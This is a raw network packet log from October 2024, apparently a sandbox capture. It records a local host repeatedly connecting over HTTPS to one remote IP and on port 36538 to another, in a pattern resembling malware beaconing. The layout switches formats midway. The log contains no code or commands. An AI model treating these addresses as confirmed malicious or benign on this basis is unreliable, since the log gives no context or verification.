                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.348813057 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.348891973 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.349801064 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.349832058 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.309792995 CEST5228153192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.316438913 CEST53522811.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.316529989 CEST5228153192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.323199987 CEST53522811.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.947650909 CEST5228153192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.953119040 CEST53522811.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.953254938 CEST5228153192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.375269890 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.375328064 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.375411987 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.375770092 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.375785112 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.242149115 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.246690989 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.246712923 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.606451035 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.606498957 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.606564045 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.606977940 CEST52287443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.606992006 CEST44352287162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.607532024 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.607584000 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.607647896 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.607873917 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:42.607888937 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.467020988 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.468532085 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.468575954 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.824790955 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.824850082 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.825079918 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.825493097 CEST52294443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:43.825515985 CEST44352294162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.590423107 CEST3653849784147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.590481043 CEST4978436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.834362030 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.834402084 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.834485054 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.834800005 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:45.834814072 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:46.707580090 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:46.709223986 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:46.709250927 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.068567038 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.068636894 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.068784952 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.069272041 CEST52317443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.069295883 CEST44352317162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.069873095 CEST52323443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.069912910 CEST44352323162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.070034981 CEST52323443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.070549965 CEST52323443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.070561886 CEST44352323162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:47.955079079 CEST44352323162.19.58.157192.168.2.7
Oct 15, 2024 11:20:47.956558943 CEST  52323  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:47.956576109 CEST  443    52323  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:48.319721937 CEST  443    52323  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:48.319873095 CEST  443    52323  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:48.320286036 CEST  52323  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:48.320313931 CEST  443    52323  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:48.320324898 CEST  52323  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:49.990014076 CEST  49784  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:49.991698980 CEST  52339  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:49.994858027 CEST  36538  49784  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:49.996507883 CEST  36538  52339  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:49.996597052 CEST  52339  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:50.007306099 CEST  52339  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:50.012268066 CEST  36538  52339  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:50.334197044 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:50.334227085 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:50.334305048 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:50.334517956 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:50.334532976 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.213824034 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.215327024 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.215351105 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.576709986 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.576756954 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.576807022 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.577224016 CEST  52344  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.577231884 CEST  443    52344  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.578562975 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.578577995 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:51.578663111 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.578882933 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:51.578893900 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:52.436475039 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:52.437521935 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:52.437537909 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:52.794894934 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:52.794953108 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:52.795008898 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:52.795331955 CEST  52350  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:52.795348883 CEST  443    52350  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:54.803365946 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:54.803400040 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:54.803476095 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:54.803786039 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:54.803797007 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:55.677370071 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:55.679044008 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:55.679061890 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.046679974 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.046802044 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.046855927 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.047148943 CEST  52368  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.047164917 CEST  443    52368  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.047686100 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.047720909 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.047790051 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.048006058 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.048017025 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.920164108 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:56.947668076 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:56.947693110 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:57.744259119 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:57.744404078 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:57.744477034 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:57.744854927 CEST  52375  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:57.744880915 CEST  443    52375  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:58.503614902 CEST  36538  52339  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:58.503727913 CEST  52339  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:58.630096912 CEST  52339  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:58.631031036 CEST  52391  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:58.635080099 CEST  36538  52339  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:58.635869980 CEST  36538  52391  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:58.635948896 CEST  52391  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:58.645538092 CEST  52391  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:58.650325060 CEST  36538  52391  147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:59.759221077 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:59.759272099 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:20:59.759347916 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:59.759649992 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:20:59.759668112 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.628367901 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.631036997 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.631058931 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.987186909 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.987338066 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.987397909 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.987699986 CEST  52397  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.987720966 CEST  443    52397  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.988212109 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.988292933 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:00.988373995 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.988576889 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:00.988610983 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:01.873220921 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:01.874711990 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:01.874762058 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:02.251699924 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:02.251827955 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:02.251921892 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:02.252237082 CEST  52403  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:02.252268076 CEST  443    52403  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:04.255784988 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:04.255821943 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:04.255899906 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:04.256302118 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:04.256315947 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.111687899 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.113037109 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.113061905 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.465254068 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.465308905 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.465445995 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.465883970 CEST  52419  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.465894938 CEST  443    52419  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.466356993 CEST  52430  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.466398954 CEST  443    52430  162.19.58.157   192.168.2.7
Oct 15, 2024 11:21:05.466459990 CEST  52430  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.466696978 CEST  52430  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:21:05.466712952 CEST  443    52430  162.19.58.157   192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.349450111 CEST44352430162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.350995064 CEST52430443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.351083040 CEST44352430162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.726557016 CEST44352430162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.726702929 CEST44352430162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.726778984 CEST52430443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.727092981 CEST52430443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:06.727138042 CEST44352430162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.143122911 CEST3653852391147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.143194914 CEST5239136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.192887068 CEST5239136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.194542885 CEST5244136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.197889090 CEST3653852391147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.199327946 CEST3653852441147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.199405909 CEST5244136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.211741924 CEST5244136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:07.216742039 CEST3653852441147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:08.740565062 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:08.740689039 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:08.740956068 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:08.741307020 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:08.741339922 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.608195066 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.613605976 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.613650084 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.972230911 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.972342968 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.972477913 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.972855091 CEST52447443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.972872019 CEST44352447162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.974369049 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.974420071 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.974505901 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.974750996 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:09.974776030 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:10.839829922 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:10.841089010 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:10.841130972 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:11.198370934 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:11.198494911 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:11.198554039 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:11.198931932 CEST52458443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:11.198950052 CEST44352458162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:13.209549904 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:13.209603071 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:13.209683895 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:13.209917068 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:13.209935904 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:14.681041002 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:14.682480097 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:14.682506084 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.043456078 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.043596029 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.043812037 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.044298887 CEST52474443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.044321060 CEST44352474162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.045752048 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.045815945 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.046005011 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.047400951 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.047419071 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.807492971 CEST3653852441147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.808697939 CEST5244136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.934422970 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.935897112 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:15.935923100 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.316906929 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.316977024 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.317128897 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.317682028 CEST52481443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.317703962 CEST44352481162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.880954027 CEST5244136538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.882045984 CEST5248236538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.886009932 CEST3653852441147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.886903048 CEST3653852482147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.886991024 CEST5248236538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.896730900 CEST5248236538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:16.901578903 CEST3653852482147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:18.334362984 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:18.334405899 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:18.334487915 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:18.334727049 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:18.334747076 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.246505022 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.248032093 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.248069048 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.642663002 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.642795086 CEST44352484162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.642858028 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.643166065 CEST52484443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:19.643181086 CEST44352484162.19.58.157192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 15, 2024 11:21:19.643654108 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:19.643704891 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:19.643809080 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:19.644324064 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:19.644341946 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:20.449475050 CEST  52482        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:20.721307039 CEST  36538        52482      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:20.722501993 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:20.723813057 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:20.723838091 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:21.081041098 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:21.081166029 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:21.081229925 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:21.095196009 CEST  52485        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:21.095221996 CEST  443          52485      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:23.100316048 CEST  52486        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:23.100369930 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:23.100447893 CEST  52486        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:23.101160049 CEST  52486        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:23.101171970 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:23.969249010 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.001796007 CEST  52486        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:24.001821995 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.362960100 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.363101006 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.363152981 CEST  52486        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:24.377327919 CEST  52486        443        192.168.2.7      162.19.58.157
